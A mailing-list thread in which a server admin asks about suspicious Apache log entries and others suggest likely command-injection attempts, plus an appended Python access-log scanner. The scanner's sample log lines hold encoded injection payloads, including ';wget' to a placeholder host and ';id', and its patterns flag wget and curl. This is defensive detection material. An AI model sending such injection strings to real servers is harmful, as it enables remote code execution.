
RE: Weird message in my apache error log



Hello guys,

No, I can't think of any specific application. Yes, this web server is running a
couple of php scripts but that's it.

Following your recommendations I have installed mod_security with the set of
standard rules provided in www.modsecurity.org. I will be following up the audit log
for any clues.

Be sure that I have strange files, permissions, or open ports in this box. I run
daily checks and I got the vaccines :-)

Thanks,
Josep SERRANO.

> What does your application do? It looks like it is finding a shell script
> somewhere?  We've seen similar things when executing CGIs and not filtering
> the input data so well.  The line 22, 24 make me think there is a script
> somewhere rather than arbitrary GET data.
>
>> -----Original Message-----
>> Looks like someone is trying to do arbitrary command execution. You
>> probably have a script somewhere that says `command $_GET['var']`, and
>> someone is passing ';attack' as var, but it isn't quite working.
>>
>> I suggest using the audit log feature of mod_security, or just grepping
>> through your access logs for anything odd ('wget' is a good search
>> term).
>>
>> You might have a bot on the system, check for any odd network
>> connections, especially to port 6667 (IRC). Also look for www-data owned
>> files in /tmp.
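
The access-log search suggested in the quoted reply, as an added example that is not part of the original thread: it percent-decodes each query parameter (twice, to catch double encoding) and flags values that carry shell metacharacters, with or without a download tool such as 'wget'. The log lines, the script path /tools/ping.php and the tool list beyond 'wget' are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined log line: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Shell metacharacters that let a value break out of a `command $_GET['var']` call.
META_RE = re.compile(r'[;|&`\n]|\$\(')
# 'wget' is the search term from the thread; the other names are an assumed extension.
TOOL_RE = re.compile(r'\b(wget|curl|lynx|fetch|tftp)\b', re.I)

def decode(value, rounds=2):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (host, time, param, decoded_value, reason) for each flagged parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this pattern understands
        host, when, _method, target, _status = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = decode(value)  # parse_qsl already decoded once
            if not META_RE.search(value):
                continue
            reason = "metachar+tool" if TOOL_RE.search(value) else "metachar"
            hits.append((host, when, name, value, reason))
    return hits

# Constructed sample lines (documentation addresses, not from the poster's server).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2000:10:01:02 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2000:10:02:40 +0000] "GET /tools/ping.php?var=%3Bwget%20http%3A%2F%2Fexample.invalid%2Fa HTTP/1.0" 200 87',
    '198.51.100.7 - - [01/Jan/2000:10:02:44 +0000] "GET /tools/ping.php?var=%253Bid HTTP/1.0" 200 87',
    '203.0.113.5 - - [01/Jan/2000:10:05:00 +0000] "GET /search.php?q=wget+manual HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE):
        print(hit)
```

A bare "metachar" hit can be a legitimate value containing an encoded '&', so treat it as a lead to review rather than proof of an attempt.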



